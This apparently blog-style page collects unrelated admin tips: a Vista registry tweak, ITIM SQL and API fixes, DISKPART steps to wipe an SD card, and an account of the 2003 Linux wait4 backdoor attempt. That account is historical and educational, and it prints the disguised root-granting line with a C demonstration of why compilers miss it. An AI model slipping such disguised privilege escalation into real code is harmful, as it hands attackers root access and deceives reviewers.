Make “Command Prompt Here” Always Display for Folders in Windows Vista

There’s a simple registry hack you can do that will enable the “Open Command Window Here” item without holding down the Shift key:

Manual Registry Hack

Open up regedit.exe through the start menu search or run box, and then browse down to the following key to add the right-click menu to Directory:

HKEY_CLASSES_ROOT\Directory\shell\cmd

Rename the “Extended” value on the right to something else, like “Extended-Orig”. (Note that you could simply delete the value, but renaming it ensures that you can quickly rename it back to reverse the change.)

Aborting pending reports synchronization

Also known as unlocking ITIM Data synchronization, or how to kill a Data Sync request in ITIM.


 -- Inspect the data-synchronization (REQ_TYPE = 'DS') history entries
 SELECT STATUS, STATUS_DETAIL, STARTED_TIME
   FROM SYNCHRONIZATION_HISTORY
  WHERE REQ_TYPE = 'DS';

 -- Count how many of them are still marked as running
 SELECT COUNT(STATUS)
   FROM SYNCHRONIZATION_HISTORY
  WHERE STATUS = 'Started' AND REQ_TYPE = 'DS';

 -- Mark the stuck data-sync requests as aborted; the REQ_TYPE filter
 -- keeps 'Started' rows of other request types untouched
 UPDATE SYNCHRONIZATION_HISTORY
    SET STATUS = 'Aborted'
  WHERE STATUS = 'Started' AND REQ_TYPE = 'DS';

This will find the stuck reconciliation records and set their status to Aborted, so you can initiate a new reconciliation from the console.

#ibm, #isim, #itim, #reconciliation

Cleaning Partition on SD Card

You can format the tiny 64M FAT32 partition, but the remainder of the SD card remains “Unallocated” after you dump the existing (and inaccessible) Linux partition. No amount of pushing or shoving in the Disk Manager application is going to fix this problem. Instead, we’re going to turn to the simple and effective DISKPART tool.

Open up the Start Menu and type “diskpart” in the run box. Press enter. You’ll be prompted by the Windows UAC to authorize admin access to the DISKPART tool.

A command-prompt-like window will open up, only the prompt will say “DISKPART”. At that prompt, type “list disk”.

In the list output on our machine you can see the computer’s hard drive (119GB) and the removable SD card (14GB). It is absolutely critical you note the proper disk number. DISKPART commands are immediate and without any warning. If you type in the wrong disk number, you’re going to have a really bad time.

After identifying your SD card’s disk number, enter the following command “select disk #” where # is the disk number of your SD card.

Whatever commands you execute after this point will only make changes to the selected disk; now would be a good time to double check you’ve selected the right disk just to be extra safe.

Next, enter the command “clean”.

The clean command zeroes out the sectors of the disk that contain the partition data. If you wished to zero out all data on the SD card you could use “clean all” instead, but unless you have a pressing privacy/security reason for overwriting the entire SD card with zeros, it’s unwise to waste the read/write cycles of the flash media.

After cleaning the disk, enter the following command “create partition primary”

The command, as the syntax implies, creates a new partition on the disk and sets it to primary. After creating the primary partition, the entire storage capacity of the SD card should be available to Windows. If we peek back into Disk Manager, we no longer see a tiny partition with a huge hunk of unallocated space, but a large partition ready to be formatted:

That’s all there is to it! A little DISKPART wizardry and the SD card is factory fresh again.

#clean, #format, #partition, #sdcard

Linux Backdoor Attempt

Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.

But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.

But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]

A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
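To make the “= 0” versus “== 0” difference concrete, here is an added example in user-space C (not the kernel’s code and not from the original post): a stand-in `struct task` with only a `uid` field, the inserted line reproduced verbatim in `wait4_check_backdoored`, and the error check it imitates in `wait4_check_intended`. The flag values are the ones Linux uses for `__WCLONE` and `__WALL`; the struct and the helper functions are constructed for this example.

```c
#include <stdio.h>
#include <errno.h>

/* Minimal stand-in for the kernel's task structure, constructed for this
 * example: only the field the inserted line touched. uid 0 is root. */
struct task {
    unsigned int uid;
};

/* Option flag values as used by Linux for wait4(). */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u

/* The two lines as they appeared in the CVS copy. Because "=" assigns,
 * (current->uid = 0) evaluates to 0, so the && is always false: retval
 * stays 0 (success) and the only lasting effect is uid := 0, but only
 * when the "invalid" option combination is passed (&& short-circuits).
 * The extra parentheses around the assignment are the idiom that tells
 * gcc/clang -Wparentheses the assignment is intentional, so no warning. */
static int wait4_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the check would have to read to be the error check it imitates:
 * reject the forbidden option combination when called as root and
 * never modify the uid. */
static int wait4_check_intended(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Helper: run one variant from a task with the given uid and return the
 * uid afterwards. */
static unsigned int uid_after(int (*check)(struct task *, unsigned int),
                              unsigned int uid, unsigned int options)
{
    struct task t = { .uid = uid };
    (void)check(&t, options);
    return t.uid;
}

/* Run both variants from an unprivileged task (uid 1000) with the
 * triggering option combination. Returns 1 if the backdoored check
 * reported success yet left the task as root while the intended check
 * left the uid alone, 0 otherwise. */
static int demonstrate(void)
{
    struct task a = { .uid = 1000 };
    struct task b = { .uid = 1000 };
    unsigned int trigger = __WCLONE | __WALL;

    int ra = wait4_check_backdoored(&a, trigger);  /* 0, a.uid is now 0 */
    int rb = wait4_check_intended(&b, trigger);    /* 0, b.uid still 1000 */

    return ra == 0 && a.uid == 0 && rb == 0 && b.uid == 1000;
}

int main(void)
{
    struct task t = { .uid = 1000 };
    printf("before: uid=%u\n", t.uid);
    int r = wait4_check_backdoored(&t, __WCLONE | __WALL);
    printf("after backdoored check: retval=%d uid=%u\n", r, t.uid);
    return demonstrate() ? 0 : 1;
}
```

Compile it with `-Wall` and note that neither gcc nor clang complains about the assignment: the parenthesised form is exactly what the warning treats as deliberate, which is why a tool-only review would have missed this and the process check (a change with no approval record) is what caught it.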

This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.

But the attempt didn’t work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.

Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.

#backdoor, #linux, #nsa

Javapocalypse

ITIM as Non-Remoteable API

Error Connecting to Directory Server in ITIM as Non-Remoteable API is Used

Problem Description

When connecting to ITIM remotely through non-remoteable APIs (such as com.ibm.itim.policy.analysis.ProvisioningPolicyAnalysis), a ClassCastException can be encountered.

Cause

This is due to the LDAP cache model used by ITIM which utilizes WebSphere’s Distributed Object cache. When invoked remotely, the remote application creates a new LdapCacheKey locally which is pushed to the WAS Distributed Map. Subsequent ITIM server operations retrieve this new LdapCacheKey and throw the class cast exception upon finding the retrieved key does not match the expected key local to the ITIM server.

When using non-remoteable APIs remotely, a ClassCastException such as the following can be encountered:

 [11/14/08 16:17:23:281 CST] 0000005d SystemOut O 16:17:23,265 ERROR com.acme.integration.RestServlet:375 – com.ibm.itim.policy.analysis.PPAException: com.ibm.itim.policy.analysis.ProvisioningPolicyAnalysis.ERROR; com.ibm.itim.cache.ldap.LdapCacheValue incompatible with com.ibm.itim.cache.ICacheValue
 [11/14/08 16:17:23:281 CST] 0000005d SystemOut O java.lang.ClassCastException: com.ibm.itim.cache.ldap.LdapCacheValue incompatible with com.ibm.itim.cache.ICacheValue

Invoking non-remoteable ITIM APIs, such as ProvisioningPolicyAnalysis or other Data Services APIs, outside of the ITIM classloader may result in ClassCastExceptions related to the LDAP Cache.

Resolution/Workaround

Remoteable APIs are only those packages under com.ibm.itim.apps.* (such as com.ibm.itim.apps.policy.ProvisioningPolicyManager). All other documented APIs should be considered non-remoteable and should not be invoked remotely.

  1. IBM Technote about this

#cache, #ibm, #isim, #itim, #ldap, #remoteable

ISIM Training Resources

IBM Security Identity Manager

General

  1. IBM Security Redbooks
  2. Welcome to IBM Security Systems Information Centers
  3. Adapters for IBM Tivoli Identity Manager 5.1
  4. Adapters for IBM Security Identity Manager v6.0
  5. IBM Tivoli Identity Manager 4.5 and 4.6 Documentation Tool (DocTool)
  6. Recommendations for Backing Up Security Identity Manager (ISIM / ITIM) Environments
  7. Steps that the IBM Tivoli Identity Manager Installation Program Takes to Configure the WebSphere Environment

Blogs/Wikis

  1. IBM Tivoli Identity Manager Notes
  2. ITIM Blog by Stephen Swann